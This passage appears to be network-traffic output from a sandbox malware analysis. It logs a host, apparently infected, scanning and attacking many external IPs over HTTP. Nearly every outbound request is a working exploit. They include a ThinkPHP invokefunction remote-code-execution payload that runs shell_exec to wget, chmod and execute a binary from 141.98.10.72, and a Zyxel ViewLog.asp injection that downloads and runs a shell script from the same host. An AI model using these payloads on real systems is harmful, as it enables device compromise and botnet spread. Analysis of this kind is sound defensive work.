26 23 34 36 3b 34 65 64 66 33 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 61 35 31 66 66 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4edf3a17.1707899424.a51ff01</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
659	192.168.2.15	39258	95.78.232.113	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.712097883 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
660	192.168.2.15	50632	95.0.142.188	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.714668036 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.008598089 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:27.512422085 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:30.552450895 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:36.696161032 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.727955103 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:14.071094036 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:32:03.222058058 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
661	192.168.2.15	47552	95.86.82.1	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.722511053 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
662	192.168.2.15	39562	95.58.54.92	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.760817051 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:25.056052923 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:25.056351900 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
663	192.168.2.15	51490	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.936172009 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:55Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
664	192.168.2.15	35250	62.171.136.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.266149998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:25.475511074 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:25 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
665	192.168.2.15	50532	94.120.215.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.304311037 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
666	192.168.2.15	40664	31.200.111.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.304552078 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
667	192.168.2.15	55640	94.120.60.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.304657936 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
668	192.168.2.15	36372	62.29.43.0	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.304790020 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
669	192.168.2.15	50998	94.120.61.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.306183100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
670	192.168.2.15	49338	94.226.88.188	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.531517029 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:25.910685062 CET	218	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 14 Feb 2024 08:30:25 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.22 Content-Length: 0 Connection: close Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port
671	192.168.2.15	48744	94.123.91.34	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.553505898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
672	192.168.2.15	51534	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:25.633932114 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:56Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
673	192.168.2.15	52636	88.221.127.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:26.255701065 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.458406925 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:26 GMT Date: Wed, 14 Feb 2024 08:30:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 32 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 36 26 23 34 36 3b 32 34 36 34 64 38 65 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c5f21602.1707899426.2464d8eb</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
674	192.168.2.15	53670	88.221.4.176	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:26.259208918 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.472568989 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:26 GMT Date: Wed, 14 Feb 2024 08:30:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 65 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 36 26 23 34 36 3b 31 66 30 62 34 33 66 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.7ee6655f.1707899426.1f0b43f9</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
675	192.168.2.15	42472	88.218.138.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:26.278523922 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.503737926 CET	322	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
676	192.168.2.15	34420	88.198.144.142	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:26.486089945 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.695329905 CET	621	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: data: blob: 'unsafe-inline' Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
677	192.168.2.15	51484	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:27.629961967 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:58Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
678	192.168.2.15	51596	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:28.325840950 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:59Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
679	192.168.2.15	51626	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.014034986 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:59Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
680	192.168.2.15	55066	31.136.74.91	8080

Timestamp	Bytes transferred	Direction	Data
